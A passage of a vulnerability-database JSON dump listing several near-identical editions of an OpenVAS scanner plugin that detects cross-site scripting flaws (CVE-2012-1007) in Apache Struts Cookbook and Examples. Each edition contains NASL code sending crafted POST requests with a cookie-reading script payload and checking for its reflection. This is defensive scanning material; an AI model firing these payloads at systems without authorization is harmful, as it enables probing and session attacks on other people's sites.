application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 3}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-24T21:39:38"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "7490f736057e7e11ee0f90cf5e302f86df09a115283a73f12709a6aff33bddaf", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "b30eaa2d0507401cbd95b4e5953073c6", "key": "sourceData"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "f9894c456f964a2678924368315a1c93", "key": "references"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-04-06T11:17:52", "modified": "2018-04-06T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 9352 2018-04-06 07:13:02Z cfischer $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 9352 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name: \"insight\" , value:\"Multiple flaws due to an,\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\n\n Impact Level: Application.\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts version 2.3.3 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://secpod.org/blog/?p=450\");\n script_xref(name : \"URL\" , value : \"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nasport = 0;\nasreq = NULL;\nasres = NULL;\nasRes = NULL;\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Make list index pages\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n ## Send and Receive the response\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n ## Confirm the application Struts Cookbook\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n ## Construct the POST Attack for Struts Cookbook\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n ## Construct the POST request Struts Cookbook\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n ## Confirm the exploit\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n ## Confirm the application Struts Examples\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n ## Construct the POST data\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n ## Construct the POST request\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n ## Confirm the exploit\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 3}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2018-04-06T11:17:52"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 9, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ad39bba56c2c34db3985011426a2c23400e9704aff9cf775953be47b4cf1f33a", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "f5d0944b5b3a7ef17ec7e69c763bd80c", "key": "sourceData"}, {"hash": "cda3f379f5c476617024346b22f9387b", "key": "references"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "9bd5dcfcb227d4b92eae337f2ff06a78", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-10-11T12:43:10", "modified": "2018-10-10T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://struts.apache.org/download.cgi", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 11818 2018-10-10 11:35:42Z asteins $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 11818 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-10 13:35:42 +0200 (Wed, 10 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later,\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/download.cgi\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nuseragent = get_http_user_agent();\nhost = http_host_name(port:asport);\n\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 4}, "differentElements": ["modified", "sourceData"], "edition": 9, "lastseen": "2018-10-11T12:43:10"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "1f20718c9e247a0aa2365c3e786c8409771b7b9dc15cfafbb2943a1fdc7e7a5d", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "f2c98a053dc958409b0d7a81f06437c7", "key": "sourceData"}, {"hash": "43047984d652086d44fe4ff442598a1d", "key": "modified"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "f9894c456f964a2678924368315a1c93", "key": "references"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-09-06T15:38:46", "modified": "2018-09-06T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 11266 2018-09-06 10:59:26Z cfischer $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 11266 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-06 12:59:26 +0200 (Thu, 06 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\n\n Impact Level: Application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nasport = 0;\nasreq = NULL;\nasres = NULL;\nasRes = NULL;\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Make list index pages\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n ## Confirm the exploit\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 3}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2018-09-06T15:38:46"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "345f5bd0c4d8d403aab6d1f8abd8686265406d4b3514c6ed808eca78253500c3", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "ae4770693df19f857449d3ce861e844e", "key": "sourceData"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "e9f06700097717caa722b47ba469b849", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "f9894c456f964a2678924368315a1c93", "key": "references"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-09-14T15:44:38", "modified": "2018-09-13T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 11374 2018-09-13 12:45:05Z asteins $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 11374 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-13 14:45:05 +0200 (Thu, 13 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n 